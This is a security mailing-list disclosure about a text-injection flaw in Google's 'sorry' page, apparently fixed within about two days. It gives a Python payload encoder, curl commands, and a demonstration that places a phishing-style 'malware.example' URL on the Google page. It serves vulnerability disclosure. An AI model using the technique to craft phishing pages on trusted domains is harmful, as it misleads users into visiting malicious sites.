I tested a few more times, and it appears the text injection has
disappeared.

These are timestamps when I tested, with offsets relative to the initial
discovery.

+0h     2025-01-28 03:00        initial discovery
+5h     2025-01-28 08:19        ?q=EgtoZWxsbyB3b3JsZA works
                                (https://archive.is/DD9xB)
+14h    2025-01-28 17:31        ?q=EgtoZWxsbyB3b3JsZA works
                                (no archive)
+45h    2025-01-30 00:18        ?q=EgtoZWxsbyB3b3JsZA doesn't work
                                (https://archive.is/0PJRW)

On Tue, Jan 28, 2025 at 02:26:16AM -0700, David Fifield wrote:
> The page https://www.google.com/sorry/index is familiar to Tor and VPN
> users. It is the one that says "Our systems have detected unusual
> traffic from your computer network. Please try your request again
> later." You will frequently be redirected to this page when using Tor
> Browser, when you do a search on a Google site such as www.youtube.com
> or scholar.google.com. The text of the page reports the client IP
> address, a timestamp of the request, and the URL that was requested.
> 
> At 2025-01-28 03:00 or earlier, the "sorry" page changed its behavior
> from what I have seen before. After the client IP address, the page now
> displays " ≠ ", followed by a few apparently nonsense bytes (not even
> necessarily properly UTF-8–encoded). The extra bytes turn out to come
> from a data structure that is encoded in the ?q URL query parameter. By
> changing the ?q parameter, you can make the string of bytes have any
> length and contents you like. The byte string will be included in the
> HTML body, after the client IP address and " ≠ ". However, any bytes
> that have meaning in HTML will be HTML-escaped, so while you can make
> text appear on the page, no XSS is possible, as far as I can tell.
> 
> This is a simple demonstration:
> 
>       https://www.google.com/sorry/index?q=EgtoZWxsbyB3b3JsZA
>       (archived) https://archive.is/DD9xB
> 
> This displays:
> 
>       IP address: <client IP address> ≠ hello world
> 
> Let's decode the ?q payload to see what's going on.
> 
>       $ python3 -c 'import base64; 
> print(repr(base64.urlsafe_b64decode("EgtoZWxsbyB3b3JsZA==")))'
>       b'\x12\x0bhello world'
> 
> After base64 decoding, the first byte is 0x12, which is some kind of
> data type indicator. The second byte, 0x0b, is the length of the value
> to follow. Then the value is what ends up being copied into the page.
> 
> The length field is actually a Protobuf varint. Lengths greater than 127
> need to be encoded as more than 1 byte:
> https://protobuf.dev/programming-guides/encoding/#varints
> The following is a Python program to encode arbitrary byte strings
> appropriately for the ?q parameter:
> 
> #!/usr/bin/env python3
> import base64
> import sys
> if len(sys.argv) > 1:
>     payload, = sys.argv[1:]
>     payload = payload.encode()
> else:
>     payload = sys.stdin.buffer.read()
> def encode_varint(n):
>     e = [n & 0x7f]
>     n >>= 7
>     while n > 0:
>         e[len(e) - 1] |= 0x80
>         e.append(n & 0x7f)
>         n >>= 7
>     return bytes(e)
> print(base64.urlsafe_b64encode(b"\x12" + encode_varint(len(payload)) + 
> payload).rstrip(b"=").decode())
> 
> Use it as follows, for example:
> 
>       $ curl "https://www.google.com/sorry/index?q=$(printf 'hello world' | 
> ./sorry-payload)"
> 
> You can see what HTML escaping the server applies by sending a string
> that consists of every byte value:
> 
>       $ curl "https://www.google.com/sorry/index?q=$(for c in $(seq 0 255); 
> do printf '\x'$(printf %02x $c); done | ./sorry-payload)" -o resp
> 
> 00000000: 0001 0203 0405 0607 0820 2020 2020 0e0f  .........     ..
> 00000010: 1011 1213 1415 1617 1819 1a1b 1c1d 1e1f  ................
> 00000020: 2021 2671 756f 743b 2324 2526 616d 703b   !&quot;#$%&amp;
> 00000030: 2623 3339 3b28 292a 2b2c 2d2e 2f30 3132  &#39;()*+,-./012
> 00000040: 3334 3536 3738 393a 3b26 6c74 3b3d 2667  3456789:;&lt;=&g
> 00000050: 743b 3f40 4142 4344 4546 4748 494a 4b4c  t;?@ABCDEFGHIJKL
> 00000060: 4d4e 4f50 5152 5354 5556 5758 595a 5b5c  MNOPQRSTUVWXYZ[\
> 00000070: 5d5e 5f60 6162 6364 6566 6768 696a 6b6c  ]^_`abcdefghijkl
> 00000080: 6d6e 6f70 7172 7374 7576 7778 797a 7b7c  mnopqrstuvwxyz{|
> 00000090: 7d7e 7f80 8182 8384 8586 8788 898a 8b8c  }~..............
> 000000a0: 8d8e 8f90 9192 9394 9596 9798 999a 9b9c  ................
> 000000b0: 9d9e 9fa0 a1a2 a3a4 a5a6 a7a8 a9aa abac  ................
> 000000c0: adae afb0 b1b2 b3b4 b5b6 b7b8 b9ba bbbc  ................
> 000000d0: bdbe bfc0 c1c2 c3c4 c5c6 c7c8 c9ca cbcc  ................
> 000000e0: cdce cfd0 d1d2 d3d4 d5d6 d7d8 d9da dbdc  ................
> 000000f0: ddde dfe0 e1e2 e3e4 e5e6 e7e8 e9ea ebec  ................
> 00000100: edee eff0 f1f2 f3f4 f5f6 f7f8 f9fa fbfc  ................
> 00000110: fdfe ff                                  ...
> 
> The following replacements are applied:
> 
>       0x09    HT      becomes 0x20
>       0x0a    LF      becomes 0x20
>       0x0b    VT      becomes 0x20
>       0x0c    FF      becomes 0x20
>       0x0d    CR      becomes 0x20
>       0x22    "       becomes &quot;
>       0x26    &       becomes &amp;
>       0x27    '       becomes &#39;
>       0x3c    <       becomes &lt;
>       0x3e    >       becomes &gt;
> 
> Besides 0x12, there are other type codes normally present in the ?q
> parameter. Collect a few ?q parameter values organically, base64 decode
> them, and you will see similar structures and repeated byte strings. If
> ?q contains more than one 0x12 specification, it looks like the last one
> wins. In the ?q values I saw, the 0x12 value was 4 bytes long, and
> contained the IPv4 address of a Tor exit node. The " ≠ " after the
> textual client IP address makes it look like it's some debugging code
> related to IP address comparison.
> 
> You can get the "sorry" page in languages other than English using
> either the ?hl URL query parameter or the Accept-Language HTTP header.
> The languages I tried used the same escaping as the default English one.
> The ?ie and ?oe (input encoding and output encoding;
> https://developers.google.com/custom-search/docs/xml_results#wsCharacterEncoding)
> parameters do not appear to have any effect.
> 
>       $ curl "https://www.google.com/sorry/index?q=$(printf 'hello world' | 
> ./sorry-payload)" -H 'Accept-Language: zh-CN'
>       https://www.google.com/sorry/index?q=EgtoZWxsbyB3b3JsZA&hl=zh-CN
>       (archive) https://archive.is/P6dbS
> 
> Though it's not possible to inject active content such as HTML or
> JavaScript, one could cause a phishing-style plaintext URL to appear on
> the page:
> 
>       $ curl "https://www.google.com/sorry/index?q=$(printf 'Copy and paste 
> this URL to fix the problem: \u27a1\ufe0fhttp://malware.example/\u2b05\ufe0f' 
> | ./sorry-payload)"
>       
> https://www.google.com/sorry/index?q=Ek9Db3B5IGFuZCBwYXN0ZSB0aGlzIFVSTCB0byBmaXggdGhlIHByb2JsZW06IOKeoe-4j2h0dHA6Ly9tYWx3YXJlLmV4YW1wbGUv4qyF77iP
>       (archive) https://archive.is/D8cf4
> 
> Similar tricks are possible with the ?continue URL query parameter,
> which is omitted in the above examples, but which normally appears in
> redirections to https://www.google.com/sorry/index. The contents of
> ?continue get inserted after the "URL: " label on the page.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Reply via email to